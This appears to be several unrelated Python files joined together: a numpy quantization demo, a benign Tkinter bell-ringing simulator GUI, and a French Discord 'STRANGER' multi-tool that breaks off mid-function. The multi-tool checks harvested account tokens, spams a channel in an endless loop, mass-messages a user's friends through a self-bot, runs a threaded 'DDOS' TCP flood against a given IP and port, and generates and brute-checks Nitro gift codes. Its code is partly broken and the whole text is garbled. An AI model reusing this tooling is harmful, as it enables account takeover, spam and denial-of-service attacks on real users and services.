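if __name__ == "__main__":
    demo = numpy.array([-1.0, 0.0, 0.5, 1.0], dtype=numpy.float32)
    print(quantize_nparray("uint8", demo, 0.0078125, 128))  # -> [  0 128 192 255]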
|
from multiprocessing import Process, Pipe
import socket
from sys import byteorder
from Ringers import ringers
from Methods import methods, Method
from Strike import ring_bells
from Config import Config
from PIL import Image
from threading import Thread
from tkinter import *
from tkinter import ttk
import traceback
class PlayableExtent():
def __init__(self, method, extent_key):
self.method = method
self.extent_key = extent_key
def __str__(self):
return self.method.name + ' - ' + self.method.extent_name(self.extent_key)
def name(self):
return self.method.extent_name(self.extent_key)
def coverable(self):
return self.method.coverable()
def number_of_bells(self):
return self.method.number_of_bells()
def method_name(self):
return self.method.name
def extent_id(self):
return self.extent_key
def selected(self, event):
global selected_method, started, add_cover
selected_method = self
started = stop()
        # If a Minor, Major, etc. then no cover
if selected_method.coverable():
add_cover_checkbox['state'] = 'normal'
add_cover.set(True)
else:
add_cover_checkbox['state'] = 'disabled'
add_cover.set(False)
courses.set(1)
intros.set(1)
parent_ringer.send("ResetAll")
manage_bell_selection(selected_method.number_of_bells(), add_cover)
set_to_handstroke(bell_ropes)
progress.set(0)
def playable_extents(mcf_list):
methods = []
for mcf in mcf_list:
methods.append(Method('./data/' + mcf[1] + '.mcf'))
playable = []
for m in methods:
extent_id = 1
while m.extent_exists(extent_id):
playable.append(PlayableExtent(m, 'EXTENT-' + str(extent_id)))
extent_id += 1
return playable
def methods_treeview(parent, mcf_list):
tree = ttk.Treeview(parent, height = 5, show = 'tree')
for mcf in mcf_list:
method = Method('./data/' + mcf[1] + '.mcf')
branch = tree.insert('', 'end', mcf[1], text = method.name, values = (method,))
extent_id = 1
while method.extent_exists(extent_id):
extent = PlayableExtent(method, 'EXTENT-' + str(extent_id))
tree.insert(branch, 'end', extent, text = extent.name(), tags = (extent,))
tree.tag_bind(extent, '<<TreeviewSelect>>', extent.selected)
extent_id += 1
return tree
def manage_bell_selection(number_of_bells, add_cover):
for ndx in range(len(bell_selector_checkboxes)):
bell_selector_vars[ndx].set(False)
bell_selector_checkboxes[ndx]['state'] = 'normal'
bell_selector_checkboxes[ndx]['text'] = str(ndx + 1) + ' '
bell_controller(ndx + 1, bell_selector_vars[ndx])
bell_selector_checkboxes[0]['text'] = 'Treble'
nob = number_of_bells
if nob % 2 != 0 and add_cover.get() and nob < MAX_BELLS:
nob += 1
bell_selector_checkboxes[nob - 1]['text'] = 'Tenor '
for ndx in range(nob, len(bell_selector_checkboxes)):
bell_selector_checkboxes[ndx]['state'] = 'disabled'
def start():
parent_method.send("Start")
parent_ringer.send("Start")
return True
def stop():
parent_method.send("Stop")
parent_ringer.send("Stop")
return False
def bell_controller(bell_id, selected):
parent_method.send("Play," + str(bell_id) + "," + ("False" if selected.get() else "True"))
parent_ringer.send("ListenFor," + str(bell_id) + "," + ("True" if selected.get() else "False"))
def bell_indicators():
INDICATE_BELL_HANDSTROKE = config.getint('GUI_EVENT_LISTENER_COMMANDS', 'indicate_type_bell') << config.getint('GUI_EVENT_LISTENER_COMMANDS', 'indicate_type_shift')
INDICATE_BELL_BACKSTROKE = INDICATE_BELL_HANDSTROKE + \
(config.getint('GUI_EVENT_LISTENER_COMMANDS', 'indicate_stroke_mask') << config.getint('GUI_EVENT_LISTENER_COMMANDS', 'indicate_stroke_shift'))
INDICATE_BELL_GRAPHIC_CLEAR = config.getint('GUI_EVENT_LISTENER_COMMANDS', 'indicate_type_graphic') << config.getint('GUI_EVENT_LISTENER_COMMANDS', 'indicate_type_shift')
INDICATE_BELL_GRAPHIC_SHOW = INDICATE_BELL_GRAPHIC_CLEAR + \
(config.getint('GUI_EVENT_LISTENER_COMMANDS', 'indicate_graphic_mask') << config.getint('GUI_EVENT_LISTENER_COMMANDS', 'indicate_graphic_shift'))
INDICATE_BELL_NUMBER_SHIFT = config.getint('GUI_EVENT_LISTENER_COMMANDS', 'indicate_bell_number_shift')
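    # Each UDP command word packs an event type, a stroke/graphic flag and a bell
    # number (shifted by INDICATE_BELL_NUMBER_SHIFT) into one integer; the four
    # dictionaries built below invert that packing so the GUI listener can map a
    # received command straight back to a bell index.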
hand = {}
back = {}
graphic_show = {}
graphic_clear = {}
for ndx in range(config.getint('BELLS', 'bells')):
hand[INDICATE_BELL_HANDSTROKE | (ndx << INDICATE_BELL_NUMBER_SHIFT)] = ndx
back[INDICATE_BELL_BACKSTROKE | (ndx << INDICATE_BELL_NUMBER_SHIFT)] = ndx
graphic_show[INDICATE_BELL_GRAPHIC_SHOW | (ndx << INDICATE_BELL_NUMBER_SHIFT)] = ndx
graphic_clear[INDICATE_BELL_GRAPHIC_CLEAR | (ndx << INDICATE_BELL_NUMBER_SHIFT)] = ndx
return hand, back, graphic_show, graphic_clear
def set_to_handstroke(ropes):
for ndx in range(MAX_BELLS):
ropes[ndx]['image'] = sally_pic
def gui_events_listener(addr, port, window):
sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
sock.bind((addr, port))
EXIT = config.getint('GUI_EVENT_LISTENER_COMMANDS', 'indicate_exit')
handstroke_indicators, backstroke_indicators, graphic_show_indicators, graphic_clear_indicators = bell_indicators()
while True:
data, from_addr = sock.recvfrom(8)
command = int.from_bytes(data, byteorder)
if command in handstroke_indicators:
window.event_generate('<<BELL_HAND_STROKE_' + str(handstroke_indicators[command]) + '>>')
elif command in backstroke_indicators:
window.event_generate('<<BELL_BACK_STROKE_' + str(backstroke_indicators[command]) + '>>')
elif command in graphic_show_indicators:
window.event_generate('<<INDICATE_SHOW_' + str(graphic_show_indicators[command]) + '>>')
elif command in graphic_clear_indicators:
window.event_generate('<<INDICATE_CLEAR_' + str(graphic_clear_indicators[command]) + '>>')
elif command == EXIT:
break
def pace_change(value):
parent_method.send("Pace," + str(value))
def courses_change():
    global started
    started = stop()
def intros_change():
    global started
    started = stop()
def add_cover_change():
    global started
    started = stop()
    if selected_method:
        manage_bell_selection(selected_method.number_of_bells(), add_cover)
        set_to_handstroke(bell_ropes)
def gui_look_to():
global started
started = stop()
set_to_handstroke(bell_ropes)
progress_bar['maximum'] = selected_method.method.extent_size(selected_method.extent_id(), add_cover.get(), intros.get(), courses.get())
progress.set(0)
request = "Load," + selected_method.method_name() + "," + selected_method.extent_id() + ","
if not add_cover.get():
request = request + "no"
request = request + "cover," + str(intros.get()) + ',' + str(courses.get()) + ',' + str(wait_learner.get())
parent_method.send(request)
started = start()
def gui_stand():
    global started
    started = stop()
    set_to_handstroke(bell_ropes)
def gui_exit():
sock.sendto(config.getint('GUI_EVENT_LISTENER_COMMANDS', 'indicate_exit').to_bytes(1, byteorder), (config.get('GUI_EVENT_LISTENER', 'addr',), config.getint('GUI_EVENT_LISTENER', 'port')))
window.destroy()
def bell_selected_callback(bell_id, selected):
s = selected
s.set(False)
b = bell_id + 1
return lambda : bell_controller(b, s)
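# (bell_selected_callback above, like the *_callback helpers below, copies its
# arguments into locals before building the lambda; binding the loop variable
# directly would hit Python's late-binding closures and leave every callback
# pointing at the final loop value.)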
def handstroke_callback(bell_id):
b = bell_id
return lambda event : show_handstroke(b)
def show_handstroke(bell_id):
if started and animated_ropes.get():
progress.set(progress.get() + 1)
bell_ropes[bell_id]['image'] = sally_pic
def backstroke_callback(bell_id):
b = bell_id
return lambda event : show_backstroke(b)
def show_backstroke(bell_id):
if started and animated_ropes.get():
progress.set(progress.get() + 1)
bell_ropes[bell_id]['image'] = tail_pic
def indicate_show_callback(bell_id):
b = bell_id
return lambda event : show_indicator(b)
def show_indicator(bell_id):
if started and bong_along.get():
bell_pull_indicators[bell_id]['image'] = indicator_bell_pic
def indicate_clear_callback(bell_id):
b = bell_id
return lambda event : clear_indicator(b)
def clear_indicator(bell_id):
if started and bong_along.get():
bell_pull_indicators[bell_id]['image'] = indicator_blank_pic
def center(window):
window.update_idletasks()
width = window.winfo_width()
frm_width = window.winfo_rootx() - window.winfo_x()
win_width = width + 2 * frm_width
height = window.winfo_height()
titlebar_height = window.winfo_rooty() - window.winfo_y()
win_height = height + titlebar_height + frm_width # seems strange to use width in height calculation
x = window.winfo_screenwidth() // 2 - win_width // 2
y = window.winfo_screenheight() // 2 - win_height // 2
window.geometry('{}x{}+{}+{}'.format(width, height, x, y))
window.deiconify()
if __name__ == '__main__':
config = Config('ensemble.ini')
MAX_BELLS = config.getint('BELLS', 'bells')
parent_method, child_method = Pipe()
parent_ringer, child_ringer = Pipe()
sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
ringer = Process(target = ringers, args = (child_ringer, parent_method, config.get('STRIKE', 'addr'), config.getint('STRIKE', 'port')))
ringer.start()
method = Process(target = methods, args = (child_method, config.get('STRIKE', 'addr'), config.getint('STRIKE', 'port')))
method.start()
bells = Process(target = ring_bells, args = (config.get('STRIKE', 'addr'), config.getint('STRIKE', 'port')))
bells.start()
    started = False
    selected_method = None
window = Tk()
style = ttk.Style()
style.theme_use('alt')
window.title('Ringable Ensemble')
window.columnconfigure(0, weight = 1)
window.rowconfigure(0, weight = 1)
window.protocol("WM_DELETE_WINDOW", gui_exit)
add_cover = BooleanVar(window)
add_cover.set(True)
bong_along = BooleanVar(window)
bong_along.set(True)
wait_learner = BooleanVar(window)
wait_learner.set(False)
animated_ropes = BooleanVar(window)
animated_ropes.set(True)
courses = IntVar(window)
courses.set(1)
intros = IntVar(window)
intros.set(1)
main_frame = ttk.Frame(window, relief = 'raised', borderwidth = 2)
main_frame.grid(column = 0, row = 0, sticky = NSEW)
main_frame.columnconfigure(0, weight = 1)
for ndx in range(5):
main_frame.rowconfigure(ndx, weight = 1)
method_frame = ttk.LabelFrame(main_frame, text = 'Select Method')
method_frame.grid(column = 0, row = 0, padx = 10, pady = 10, sticky = NSEW)
method_frame.columnconfigure(0, weight = 1)
method_frame.rowconfigure(0, weight = 1)
methods = methods_treeview(method_frame, config.items('MCF'))
methods.grid(column = 0, row = 1, sticky = NSEW)
methods_scroll_bar = ttk.Scrollbar(method_frame, orient = 'vertical', command = methods.yview)
# methods_scroll_bar = Scrollbar(method_frame, orient = 'vertical', command = methods.yview)
methods_scroll_bar.grid(column = 1, row = 1, sticky = (N, S, W))
methods['yscrollcommand'] = methods_scroll_bar.set
checkboxes_frame = ttk.Frame(main_frame)
checkboxes_frame.grid(column = 0, row = 1, padx = 10, pady = 10, sticky = NSEW)
for col in range(4):
checkboxes_frame.columnconfigure(col, weight = 1)
checkboxes_frame.rowconfigure(0, weight = 1)
add_cover_checkbox = ttk.Checkbutton(checkboxes_frame, text = 'Add cover bell', variable = add_cover, command = add_cover_change)
add_cover_checkbox.grid(column = 0, row = 0, padx = 3, pady = 3)
bong_along_checkbox = ttk.Checkbutton(checkboxes_frame, text = 'Bong-along', variable = bong_along)
bong_along_checkbox.grid(column = 1, row = 0, padx = 3, pady = 3)
wait_learner_checkbox = ttk.Checkbutton(checkboxes_frame, text = 'Wait for ringer', variable = wait_learner)
wait_learner_checkbox.grid(column = 2, row = 0, padx = 3, pady = 3)
animated_ropes_checkbox = ttk.Checkbutton(checkboxes_frame, text = 'Animated ropes', variable = animated_ropes)
animated_ropes_checkbox.grid(column = 3, row = 0, padx = 3, pady = 3)
method_control_frame = ttk.Frame(main_frame)#, borderwidth = 5, relief = RAISED)
method_control_frame.grid(column = 0, row = 2, padx = 10, pady = 10, sticky = NSEW)
for col in range(3):
method_control_frame.columnconfigure(col, weight = 1)
method_control_frame.rowconfigure(0, weight = 1)
pace_frame = ttk.Frame(method_control_frame)#, borderwidth = 5, relief = RAISED)
pace_frame.grid(column = 0, row = 0, padx = 3)#, sticky = EW)
ttk.Label(pace_frame, text = 'Set pace of rounds').grid(column = 0, row = 0, padx = 3, pady = 3)
pace_scale = Scale(pace_frame, from_ = 2.0, to = 5.0, orient = HORIZONTAL, resolution = 0.1, length = 200, tickinterval = 1.0, command = pace_change)
pace_scale.set(3.0)
pace_scale.grid(column = 1, row = 0, padx = 3, pady = 3)
courses_frame = ttk.Frame(method_control_frame)#, borderwidth = 5, relief = RAISED)
courses_frame.grid(column = 1, row = 0, padx = 3)#, sticky = EW)
ttk.Label(courses_frame, text = 'Courses').grid(column = 2, row = 0, padx = 3, pady = 3)
courses_spin = Spinbox(courses_frame, from_ = 1, to = 4, command = courses_change, state = 'readonly', textvariable = courses, width = 2, justify = CENTER)
courses_spin.grid(column = 3, row = 0, padx = 3, pady = 3)
intros_frame = ttk.Frame(method_control_frame)#, borderwidth = 5, relief = RAISED)
intros_frame.grid(column = 2, row = 0, padx = 3)#, sticky = EW)
ttk.Label(intros_frame, text = 'Intro rounds').grid(column = 4, row = 0, padx = 3, pady = 3)
intros_spin = Spinbox(intros_frame, from_ = 1, to = 4, command = intros_change, state = 'readonly', textvariable = intros, width = 2, justify = CENTER)
intros_spin.grid(column = 5, row = 0, padx = 3, pady = 3)
bell_rope_frame = ttk.LabelFrame(main_frame, text = 'Select Bells to be controlled by buttons')
bell_rope_frame.grid(column = 0, row = 3, padx = 10, pady = 10, sticky = NSEW)
bell_rope_frame.rowconfigure(0, weight = 1)
bell_pull_indicators = []
bell_ropes = []
bell_selector_vars = []
bell_selector_checkboxes = []
indicator_blank_pic = PhotoImage(file = './data/IndicatorBlank.png')
indicator_bell_pic = PhotoImage(file = './data/IndicatorBell.png')
sally_pic = PhotoImage(file = './data/SmallSally.png')
tail_pic = PhotoImage(file = './data/SmallTail.png')
for ndx in range(MAX_BELLS):
bell_rope_frame.columnconfigure(ndx, weight = 1)
indicator = Label(bell_rope_frame, image = indicator_blank_pic, width = indicator_blank_pic.width(), height = indicator_blank_pic.height())
indicator.grid(column = ndx, row = 0, padx = 3, pady = 3, sticky = EW)
bell_pull_indicators.append(indicator)
window.bind('<<INDICATE_SHOW_' + str(ndx) + '>>', func = indicate_show_callback(ndx))
window.bind('<<INDICATE_CLEAR_' + str(ndx) + '>>', func = indicate_clear_callback(ndx))
rope = Label(bell_rope_frame, image = sally_pic, width = sally_pic.width(), height = sally_pic.height())
rope.grid(column = ndx, row = 1, padx = 50, pady = 3, sticky = EW)
bell_ropes.append(rope)
window.bind('<<BELL_HAND_STROKE_' + str(ndx) + '>>', func = handstroke_callback(ndx))
window.bind('<<BELL_BACK_STROKE_' + str(ndx) + '>>', func = backstroke_callback(ndx))
bell_selector_vars.append(BooleanVar(bell_rope_frame))
check = ttk.Checkbutton(bell_rope_frame, text = str(ndx + 1) + ' ', variable = bell_selector_vars[ndx], command = bell_selected_callback(ndx, bell_selector_vars[ndx]))
check.grid(column = ndx, row = 2, padx = 3, pady = 3)#, sticky = EW)
bell_selector_checkboxes.append(check)
progress_frame = ttk.Frame(main_frame)
progress_frame.grid(column = 0, row = 4, padx = 10, pady = 10, sticky = NSEW)
progress_frame.columnconfigure(0, weight = 1)
progress_frame.rowconfigure(0, weight = 1)
progress = IntVar(window)
progress_bar = ttk.Progressbar(progress_frame, length = 100, mode = 'determinate', orient = HORIZONTAL, variable = progress)
progress_bar.grid(column = 0, row = 0, padx = 10, pady = 10, sticky = EW)
button_frame = ttk.Frame(main_frame, relief = RAISED, borderwidth = 2)
button_frame.grid(column = 0, row = 5, padx = 10, pady = 10, sticky = NSEW)
button_frame.columnconfigure(0, weight = 0)
button_frame.columnconfigure(1, weight = 1)
button_frame.columnconfigure(2, weight = 0)
button_frame.rowconfigure(0, weight = 1)
look_to_button = ttk.Button(button_frame, text = 'Look To', command = gui_look_to)
look_to_button.grid(column = 0, row = 0, padx = 3, pady = 3, sticky = W)
stand_button = ttk.Button(button_frame, text = 'Stand', command = gui_stand)
stand_button.grid(column = 1, row = 0, padx = 3, pady = 3, sticky = W)
exit_button = ttk.Button(button_frame, text = 'Exit', command = gui_exit)
exit_button.grid(column = 2, row = 0, padx = 3, pady = 3, sticky = E)
gui_events = Thread(target = gui_events_listener, args = (config.get('GUI_EVENT_LISTENER', 'addr'), config.getint('GUI_EVENT_LISTENER', 'port'), window))
gui_events.start()
center(window)
window.mainloop()
gui_events.join()
parent_method.send("Exit")
method.join()
parent_ringer.send("Exit")
ringer.join()
sock.sendto(config.getint('STRIKE_COMMANDS', 'exit').to_bytes(1, byteorder), (config.get('STRIKE', 'addr'), config.getint('STRIKE', 'port')))
bells.join()
|
from colorama import init, Fore
init()
import requests
import os
from os import system
import time
import socket
import random
import urllib.request , socket
import discord
import threading
def clear():
system("cls")
system("mode 110, 34")
os.system("title STRANGER - DEV PAR AZULAX")
def TOKEN_CHECKER():
clear()
print(Fore.LIGHTBLACK_EX+"""
████████╗░█████╗░██╗░░██╗███████╗███╗░░██╗ ░█████╗░██╗░░██╗███████╗░█████╗░██╗░░██╗███████╗██████╗░
╚══██╔══╝██╔══██╗██║░██╔╝██╔════╝████╗░██║ ██╔══██╗██║░░██║██╔════╝██╔══██╗██║░██╔╝██╔════╝██╔══██╗
░░░██║░░░██║░░██║█████═╝░█████╗░░██╔██╗██║ ██║░░╚═╝███████║█████╗░░██║░░╚═╝█████═╝░█████╗░░██████╔╝
░░░██║░░░██║░░██║██╔═██╗░██╔══╝░░██║╚████║ ██║░░██╗██╔══██║██╔══╝░░██║░░██╗██╔═██╗░██╔══╝░░██╔══██╗
░░░██║░░░╚█████╔╝██║░╚██╗███████╗██║░╚███║ ╚█████╔╝██║░░██║███████╗╚█████╔╝██║░╚██╗███████╗██║░░██║
░░░╚═╝░░░░╚════╝░╚═╝░░╚═╝╚══════╝╚═╝░░╚══╝ ░╚════╝░╚═╝░░╚═╝╚══════╝░╚════╝░╚═╝░░╚═╝╚══════╝╚═╝░░╚═╝
""")
print("oublie pas de mettre les tokens a verif dans le txt x))")
time.sleep(3)
with open("gen/token_gen.txt") as f:
for line in f:
token = line.strip("\n")
headers = {'Content-Type': 'application/json', 'authorization': token}
url = "https://discordapp.com/api/v6/users/@me/library"
r = requests.get(url, headers=headers)
if r.status_code == 200:
print("{} | Token Valid".format(line.strip("\n")))
else:
print("Token Invalid | {}".format(line.strip("\n")))
def TOKEN_DM():
clear()
os.system("title STRANGER/TOKEN DM")
print(Fore.GREEN +"""
████████╗░█████╗░██╗░░██╗███████╗███╗░░██╗ ██████╗░███╗░░░███╗
╚══██╔══╝██╔══██╗██║░██╔╝██╔════╝████╗░██║ ██╔══██╗████╗░████║
░░░██║░░░██║░░██║█████═╝░█████╗░░██╔██╗██║ ██║░░██║██╔████╔██║
░░░██║░░░██║░░██║██╔═██╗░██╔══╝░░██║╚████║ ██║░░██║██║╚██╔╝██║
░░░██║░░░╚█████╔╝██║░╚██╗███████╗██║░╚███║ ██████╔╝██║░╚═╝░██║
░░░╚═╝░░░░╚════╝░╚═╝░░╚═╝╚══════╝╚═╝░░╚══╝ ╚═════╝░╚═╝░░░░░╚═╝
"""+ Fore.RESET)
print("")
token = input("[+]token :")
clear()
print(Fore.GREEN +"""
████████╗░█████╗░██╗░░██╗███████╗███╗░░██╗ ██████╗░███╗░░░███╗
╚══██╔══╝██╔══██╗██║░██╔╝██╔════╝████╗░██║ ██╔══██╗████╗░████║
░░░██║░░░██║░░██║█████═╝░█████╗░░██╔██╗██║ ██║░░██║██╔████╔██║
░░░██║░░░██║░░██║██╔═██╗░██╔══╝░░██║╚████║ ██║░░██║██║╚██╔╝██║
░░░██║░░░╚█████╔╝██║░╚██╗███████╗██║░╚███║ ██████╔╝██║░╚═╝░██║
░░░╚═╝░░░░╚════╝░╚═╝░░╚═╝╚══════╝╚═╝░░╚══╝ ╚═════╝░╚═╝░░░░░╚═╝
"""+ Fore.RESET)
id = input("[+]id :")
clear()
print(Fore.GREEN +"""
████████╗░█████╗░██╗░░██╗███████╗███╗░░██╗ ██████╗░███╗░░░███╗
╚══██╔══╝██╔══██╗██║░██╔╝██╔════╝████╗░██║ ██╔══██╗████╗░████║
░░░██║░░░██║░░██║█████═╝░█████╗░░██╔██╗██║ ██║░░██║██╔████╔██║
░░░██║░░░██║░░██║██╔═██╗░██╔══╝░░██║╚████║ ██║░░██║██║╚██╔╝██║
░░░██║░░░╚█████╔╝██║░╚██╗███████╗██║░╚███║ ██████╔╝██║░╚═╝░██║
░░░╚═╝░░░░╚════╝░╚═╝░░╚═╝╚══════╝╚═╝░░╚══╝ ╚═════╝░╚═╝░░░░░╚═╝
"""+ Fore.RESET)
message = input("[+]message :")
clear()
print(Fore.GREEN +"""
████████╗░█████╗░██╗░░██╗███████╗███╗░░██╗ ██████╗░███╗░░░███╗
╚══██╔══╝██╔══██╗██║░██╔╝██╔════╝████╗░██║ ██╔══██╗████╗░████║
░░░██║░░░██║░░██║█████═╝░█████╗░░██╔██╗██║ ██║░░██║██╔████╔██║
░░░██║░░░██║░░██║██╔═██╗░██╔══╝░░██║╚████║ ██║░░██║██║╚██╔╝██║
░░░██║░░░╚█████╔╝██║░╚██╗███████╗██║░╚███║ ██████╔╝██║░╚═╝░██║
░░░╚═╝░░░░╚════╝░╚═╝░░╚═╝╚══════╝╚═╝░░╚══╝ ╚═════╝░╚═╝░░░░░╚═╝
"""+ Fore.RESET)
def sendMessage(token, id, message):
url = 'https://discordapp.com/api/v6/channels/{}/messages'.format(id)
data = {"content": message}
header = {"authorization": token}
r = requests.post(url, data=data, headers=header)
h = r.status_code
if h == 200:
print("[+] Message Send")
elif h == 429:
print("[/] chargement")
else:
print("[-] Faild !")
while True:
sendMessage(token, id, message)
def DM_ALL():
clear()
print(Fore.RED+"""
██████╗░███╗░░░███╗ ░█████╗░██╗░░░░░██╗░░░░░
██╔══██╗████╗░████║ ██╔══██╗██║░░░░░██║░░░░░
██║░░██║██╔████╔██║ ███████║██║░░░░░██║░░░░░
██║░░██║██║╚██╔╝██║ ██╔══██║██║░░░░░██║░░░░░
██████╔╝██║░╚═╝░██║ ██║░░██║███████╗███████╗
╚═════╝░╚═╝░░░░░╚═╝ ╚═╝░░╚═╝╚══════╝╚══════╝
"""+Fore.RESET)
toto = input("[+] Token >>")
missage = input("[+] Message >>")
client = discord.Client()
@client.event
async def on_connect(message=missage):
for user in client.user.friends:
try:
await user.send(message)
print(f'envoyé a {user.name}')
except:
print(f'fail : {user.name}')
client.run(toto, bot=False)
def TOKEN_TOOLS():
clear()
print(Fore.GREEN +"""
████████╗░█████╗░██╗░░██╗███████╗███╗░░██╗ ████████╗░█████╗░░█████╗░██╗░░░░░░██████╗
╚══██╔══╝██╔══██╗██║░██╔╝██╔════╝████╗░██║ ╚══██╔══╝██╔══██╗██╔══██╗██║░░░░░██╔════╝
░░░██║░░░██║░░██║█████═╝░█████╗░░██╔██╗██║ ░░░██║░░░██║░░██║██║░░██║██║░░░░░╚█████╗░
░░░██║░░░██║░░██║██╔═██╗░██╔══╝░░██║╚████║ ░░░██║░░░██║░░██║██║░░██║██║░░░░░░╚═══██╗
░░░██║░░░╚█████╔╝██║░╚██╗███████╗██║░╚███║ ░░░██║░░░╚█████╔╝╚█████╔╝███████╗██████╔╝
░░░╚═╝░░░░╚════╝░╚═╝░░╚═╝╚══════╝╚═╝░░╚══╝ ░░░╚═╝░░░░╚════╝░░╚════╝░╚══════╝╚═════╝░
"""+Fore.RESET)
print("")
print(Fore.BLUE +" [1]SPAM CHANNELS"+Fore.RESET)
print(Fore.BLUE+" [2]DMALL"+Fore.RESET)
print("")
print(" L pour retourner en arrière")
print("")
token_choice = input(Fore.BLUE +" [+] choix:"+ Fore.RESET)
if token_choice == '1':
TOKEN_DM()
if token_choice == '2':
DM_ALL()
elif token_choice == 'l' or 'L':
return
def DDOS():
clear()
print(Fore.LIGHTRED_EX+"""
██████╗░██████╗░░█████╗░░██████╗
██╔══██╗██╔══██╗██╔══██╗██╔════╝
██║░░██║██║░░██║██║░░██║╚█████╗░
██║░░██║██║░░██║██║░░██║░╚═══██╗
██████╔╝██████╔╝╚█████╔╝██████╔╝
╚═════╝░╚═════╝░░╚════╝░╚═════╝░
"""+Fore.RESET)
with open("ddos/proxys.txt") as f:
for line in f:
proxys = line.strip("\n")
target = input("[+] IP >")
port = int(input("[+] Port >"))
threadee = input('[+] Thread >')
temps = int(input("[+] Temps >"))
timeout = time.time() + temps
sent = 0
while True:
if time.time() > timeout:
print('temps écouler x)')
ime.sleep(2)
else:
pass
def attack():
while True:
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((ip, port))
s.sendto(('GET /' + target + 'HTTP/1.1\r\n').encode('ascii'), (target, port))
s.sendto(('Host: '+proxys+'\r\n\r\n').encode('ascii'), (target,port))
s.close()
for i in range(int(threadee)):
thread = threading.Thread(target=attack)
thread.start()
def NITRO_CHECKER():
clear()
print(Fore.MAGENTA+"""
███╗░░██╗██╗████████╗██████╗░░█████╗░ ░█████╗░██╗░░██╗███████╗░█████╗░██╗░░██╗███████╗██████╗░
████╗░██║██║╚══██╔══╝██╔══██╗██╔══██╗ ██╔══██╗██║░░██║██╔════╝██╔══██╗██║░██╔╝██╔════╝██╔══██╗
██╔██╗██║██║░░░██║░░░██████╔╝██║░░██║ ██║░░╚═╝███████║█████╗░░██║░░╚═╝█████═╝░█████╗░░██████╔╝
██║╚████║██║░░░██║░░░██╔══██╗██║░░██║ ██║░░██╗██╔══██║██╔══╝░░██║░░██╗██╔═██╗░██╔══╝░░██╔══██╗
██║░╚███║██║░░░██║░░░██║░░██║╚█████╔╝ ╚█████╔╝██║░░██║███████╗╚█████╔╝██║░╚██╗███████╗██║░░██║
╚═╝░░╚══╝╚═╝░░░╚═╝░░░╚═╝░░╚═╝░╚════╝░ ░╚════╝░╚═╝░░╚═╝╚══════╝░╚════╝░╚═╝░░╚═╝╚══════╝╚═╝░░╚═╝
"""+Fore.RESET)
print("oublie pas de générer des nitros pour ensuite les vérif ;)")
time.sleep(3)
with open("gen/nitro_gen.txt") as f:
number_line=0
for line in f:
nitro = line.strip("\n")
number_line += 1
os.system(f'title {number_line}')
url = "https://discordapp.com/api/v6/entitlements/gift-codes/" + nitro + "?with_application=false&with_subscription_plan=true"
r = requests.get(url)
if r.status_code == 200:
print(Fore.GREEN+" Valid | {} ".format(line.strip("\n"))+Fore.RESET)
with open('check/nitro_valide.txt' + 'w+') as f:
f.write(nitro)
break
else:
pass
print(Fore.RED+" Invalid | {} ".format(line.strip("\n"))+Fore.RED)
print('tout à étais check ')
time.sleep(2.8)
def NITRO_GENERATOR():
clear()
print("""
███╗░░██╗██╗████████╗██████╗░░█████╗░ ░██████╗░███████╗███╗░░██╗
████╗░██║██║╚══██╔══╝██╔══██╗██╔══██╗ ██╔════╝░██╔════╝████╗░██║
██╔██╗██║██║░░░██║░░░██████╔╝██║░░██║ ██║░░██╗░█████╗░░██╔██╗██║
██║╚████║██║░░░██║░░░██╔══██╗██║░░██║ ██║░░╚██╗██╔══╝░░██║╚████║
██║░╚███║██║░░░██║░░░██║░░██║╚█████╔╝ ╚██████╔╝███████╗██║░╚███║
╚═╝░░╚══╝╚═╝░░░╚═╝░░░╚═╝░░╚═╝░╚════╝░ ░╚═════╝░╚══════╝╚═╝░░╚══╝
""")
limite = 24
lettres = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789'
number = int(input("[+] Entre le nombre de nitro que tu veux générer >>"))
o = open("gen/nitro_gen.txt", "w")
for i in range(number):
o.write('discord.gift/'+''.join(random.choice(lettres) for i in range(limite)) + '\n')
o.close()
print("vérifi ton dossier (les nitros ont étais générer la bas ;))")
time.sleep(3.5)
GENERATEUR_TOOLS()
def GENERATEUR_TOOLS():
clear()
print(Fore.CYAN+"""
_____________ ____________ ___ ______________ ______ __________ ____ __ _____
/ ____/ ____/ | / / ____/ __ \/ |/_ __/ ____/ / / / __ \ /_ __/ __ \/ __ \/ / / ___/
/ / __/ __/ / |/ / __/ / /_/ / /| | / / / __/ / / / / /_/ / / / / / / / / / / / \__ \
/ /_/ / /___/ /| / /___/ _, _/ ___ |/ / / /___/ /_/ / _, _/ / / / /_/ / /_/ / /______/ /
\____/_____/_/ |_/_____/_/ |_/_/ |_/_/ /_____/\____/_/ |_| /_/ \____/\____/_____/____/
"""+Fore.RESET)
print("")
print(Fore.MAGENTA+" [1]NITRO")
print(" [2]TOKEN"+Fore.RESET)
print("")
print(" L pour retourner en arrière")
print("")
GENERATEUR_CHOICE = input(Fore.GREEN+" [+] Choice >>"+Fore.RESET)
if GENERATEUR_CHOICE == '1':
NITRO_GENERATOR()
if GENERATEUR_CHOICE == '2':
TOKEN_GEN()
elif GENERATEUR_CHOICE == 'l' or 'L':
return
def GEOIP():
clear()
print("""
░██████╗░███████╗░█████╗░██╗██████╗░
██╔════╝░██╔════╝██╔══██╗██║██╔══██╗
██║░░██╗░█████╗░░██║░░██║██║██████╔╝
██║░░╚██╗██╔══╝░░██║░░██║██║██╔═══╝░
╚██████╔╝███████╗╚█████╔╝██║██║░░░░░
░╚═════╝░╚══════╝░╚════╝░╚═╝╚═╝░░░░░
""")
input('soon soon soon soon soon soon')
def PINGER():
clear()
print("""
██████╗░██╗███╗░░██╗░██████╗░███████╗██████╗░
██╔══██╗██║████╗░██║██╔════╝░██╔════╝██╔══██╗
██████╔╝██║██╔██╗██║██║░░██╗░█████╗░░██████╔╝
██╔═══╝░██║██║╚████║██║░░╚██╗██╔══╝░░██╔══██╗
██║░░░░░██║██║░╚███║╚██████╔╝███████╗██║░░██║
╚═╝░░░░░╚═╝╚═╝░░╚══╝░╚═════╝░╚══════╝╚═╝░░╚═╝
""")
print('soon soon soon soon soon soon soon soon soon soon soon soon soon soon soon soon')
time.sleep(3)
def PROXY_CHECKER():
print("""
██████╗░██████╗░░█████╗░██╗░░██╗██╗░░░██╗ ░█████╗░██╗░░██╗███████╗░█████╗░██╗░░██╗███████╗██████╗░
